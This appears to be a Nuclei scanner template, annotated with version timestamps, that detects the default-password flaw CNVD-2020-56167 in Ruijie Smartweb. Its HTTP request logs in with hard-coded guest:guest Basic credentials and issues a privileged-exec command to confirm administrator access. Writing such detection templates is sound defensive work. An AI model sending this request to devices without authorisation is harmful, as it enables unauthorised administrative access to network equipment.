2021-06-03 16:24:08 +00:00
id : CNVD-2020-56167
2021-04-13 18:30:07 +00:00
info :
2022-10-10 19:22:59 +00:00
name : Ruijie Smartweb - Default Password
2021-04-13 18:30:07 +00:00
author : pikpikcu
severity : low
2022-10-10 19:22:59 +00:00
description : Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
2022-10-10 19:22:59 +00:00
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2024-01-14 09:21:50 +00:00
tags : cnvd,cnvd2020,ruijie,default-login
2021-04-13 18:30:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-13 18:30:07 +00:00
- method : POST
path :
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
2023-10-14 11:27:55 +00:00
2021-04-13 18:30:07 +00:00
headers :
Authorization : Basic Z3Vlc3Q6Z3Vlc3Q=
2023-10-14 11:27:55 +00:00
2021-04-13 18:30:07 +00:00
body : command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition : and
matchers :
- type : word
2022-01-04 06:23:23 +00:00
part : body
2021-04-13 18:30:07 +00:00
words :
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
2021-04-13 19:29:14 +00:00
condition : and
2021-04-13 18:30:07 +00:00
- type : status
status :
2023-10-14 11:27:55 +00:00
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a004730450220206f707c972c341622e8e5037848470fb78807b3dc49619bb3724e11e55efd750221009b249e3c56ef9025b5f50eff649dbcf9a7d8cdee87aca961f8932f8300e8372e:922c64590222798bb761d5b6d8e72950